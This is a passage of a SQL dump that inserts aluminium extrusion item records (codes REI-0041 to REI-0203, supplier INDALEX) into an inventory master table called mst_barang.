VALUES ('REI-0041', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'MF', '8645', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0042', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'BA', '8646', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0043', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'NA', '8646', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0044', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3880', null, null, 'NA', '8646', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0045', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3700', null, null, 'NA', '8646', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0046', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4010', null, null, 'MF', '8646', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0047', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'MF', '8646', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0048', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3990', null, null, 'MF', '8646', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0049', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3970', null, null, 'MF', '8646', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0050', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3930', null, null, 'MF', '8646', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0051', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3880', null, null, 'MF', '8646', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0052', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4100', null, null, 'BA', '8648', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0053', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'BA', '8648', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0054', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3990', null, null, 'BA', '8648', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0055', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2050', null, null, 'BA', '8648', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0056', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4100', null, null, 'MF', '8648', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0057', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'MF', '8648', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0058', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3970', null, null, 'MF', '8648', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0059', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2100', null, null, 'MF', '8648', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0060', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3960', null, null, 'MF', '8649', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0061', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'BA', '8650', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0062', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3990', null, null, 'BA', '8650', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0063', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3970', null, null, 'BA', '8650', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0064', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2050', null, null, 'BA', '8650', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0065', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'MF', '8650', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0066', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3990', null, null, 'MF', '8650', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0067', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3940', null, null, 'MF', '8650', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0068', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2050', null, null, 'MF', '8650', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0069', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'BA', '8651', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0070', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4100', null, null, 'NA', '8653', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0071', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3940', null, null, 'MF', '8653', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0072', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3990', null, null, 'BA', '8654', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0073', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3900', null, null, 'BA', '8654', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0074', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3990', null, null, 'MF', '8654', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0075', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '1970', null, null, 'MF', '8655', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0076', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3950', null, null, 'BA', '8656', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0077', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3880', null, null, 'NA', '8656', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0078', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4010', null, null, 'BA', '8658', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0079', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'BA', '8658', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0080', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3970', null, null, 'BA', '8658', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0081', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3930', null, null, 'BA', '8658', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0082', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3850', null, null, 'BA', '8658', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0083', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3940', null, null, 'NA', '8658', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0084', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'MF', '8658', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0085', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'MF', '8659', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0086', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'BA', '8670', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0087', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3940', null, null, 'BA', '8670', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0088', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3850', null, null, 'BA', '8670', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0089', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3960', null, null, 'MF', '8670', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0090', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'BA', '8673', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0091', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3960', null, null, 'BA', '8673', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0092', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2010', null, null, 'BA', '8673', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0093', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'MF', '8673', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0094', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2010', null, null, 'MF', '8673', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0095', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3960', null, null, 'MF', '8676', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0096', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3890', null, null, 'MF', '8676', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0097', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'NA', '8683', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0098', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3970', null, null, 'MF', '8684', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0099', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3930', null, null, 'MF', '8684', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0100', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3500', null, null, 'NA', '8688', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0101', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'NA', '8689', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0102', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2520', null, null, 'NA', '8690', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0103', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '1260', null, null, 'NA', '8690', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0104', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4010', null, null, 'NA', '8691', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0105', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'NA', '8691', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0106', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3840', null, null, 'MF', '8692', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0107', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3940', null, null, 'MF', '8693', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0108', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3990', null, null, 'MF', '8694', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0109', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3990', null, null, 'BA', '8695', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0110', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3970', null, null, 'BA', '8695', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0111', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2010', null, null, 'BA', '8695', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0112', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2010', null, null, 'MF', '8695', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0113', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3990', null, null, 'NA', '8696', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0114', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'BA', '8697', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0115', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'NA', '8697', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0116', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4090', null, null, 'NA', '8698', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0117', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4075', null, null, 'NA', '8698', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0118', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4070', null, null, 'NA', '8698', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0119', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2060', null, null, 'NA', '8698', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0120', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4075', null, null, 'MF', '8698', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0121', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3880', null, null, 'MF', '8699', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0122', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3940', null, null, 'MF', '9701', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0123', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'MF', '9702', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0124', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'BA', '9703', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0125', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'BA', '9703', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0126', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3930', null, null, 'BA', '9703', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0127', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'NA', '9703', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0128', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3950', null, null, 'NA', '9703', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0129', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3930', null, null, 'NA', '9703', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0130', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3890', null, null, 'NA', '9703', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0131', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '1316', null, null, 'NA', '9703', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0132', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2990', null, null, 'NA', '9708', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0133', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2990', null, null, 'MF', '9708', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0134', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'NA', '9711', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0135', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'NA', '9714', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0136', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3970', null, null, 'NA', '9720', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0137', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2060', null, null, 'NA', '9720', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0138', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4040', null, null, 'NA', '9723', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0139', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3150', null, null, 'NA', '9724', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0140', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '1820', null, null, 'BA', '9725', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0141', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'NA', '9728', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0142', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3900', null, null, 'NA', '9729', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0143', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '1950', null, null, 'NA', '9729', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0144', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'MF', '9733', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0145', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '1538', null, null, 'NA', '9734', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0146', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '1533', null, null, 'NA', '9734', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0147', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '1533', null, null, 'NA', '9734', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0148', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '855', null, null, 'NA', '9735', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0149', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '850', null, null, 'NA', '9735', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0150', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '850', null, null, 'NA', '9735', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0151', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '1345', null, null, 'MF', '9738', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0152', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '1330', null, null, 'MF', '9738', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0153', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3960', null, null, 'NA', '9739', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0154', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4090', null, null, 'MF', '9740', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0155', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3900', null, null, 'MF', '9740', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0156', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2050', null, null, 'MF', '9740', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0157', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3920', null, null, 'MF', '9741', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0158', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2050', null, null, 'MF', '9741', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0159', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3920', null, null, 'MF', '9743', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0160', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3970', null, null, 'MF', '9744', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0161', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3850', null, null, 'MF', '9745', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0162', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'NA', '9746', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0163', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2990', null, null, 'NA', '9751', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0164', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '1990', null, null, 'NA', '9751', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0165', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'NA', '9752', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0166', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3970', null, null, 'NA', '9752', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0167', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '1322', null, null, 'NA', '9752', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0168', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3940', null, null, 'MF', '9753', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0169', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3950', null, null, 'MF', '9754', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0170', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'MF', '9755', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0171', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3900', null, null, 'MF', '9756', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0172', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'BA', '9757', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0173', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'MF', '9757', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0174', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3900', null, null, 'MF', '9759', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0175', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3570', null, null, 'MF', '9759', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0176', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3960', null, null, 'NA 10 MC', '9760', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0177', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3730', null, null, 'NA 10 MC', '9761', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0178', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3580', null, null, 'SB + NA 10', '9761', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0179', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3580', null, null, 'NA 10 MC', '9761', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0180', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '1330', null, null, 'MF', '9763', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0181', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3705', null, null, 'MF', '9764', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0182', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3435', null, null, 'MF', '9765', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0183', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3420', null, null, 'MF', '9765', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0184', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'MF', '9766', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0185', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3740', null, null, 'NA', '9768', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0186', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'NA', '9769', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0187', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3970', null, null, 'NA', '9769', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0188', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'MF', '9770', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0189', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'MF', '9770', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0190', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'MF', '9773', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0191', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3680', null, null, 'NA', '9774', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0192', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3990', null, null, 'BA', '9775', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0193', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3030', null, null, 'MF', '9776', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0194', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'MF', '9777', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0195', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3900', null, null, 'BA', '26062', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0196', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2980', null, null, 'MF', '26124', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0197', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3940', null, null, 'MF', '27003', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0198', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3900', null, null, 'MF', '27024', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0199', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3820', null, null, 'NA', '28008', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0200', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3130', null, null, 'NA', '28062', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0201', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'NA', '8609A', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0202', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '1330', null, null, 'MF', '9713A', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0203', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3890', null, null, 'BA', '26062', 'KG', null, '', '', 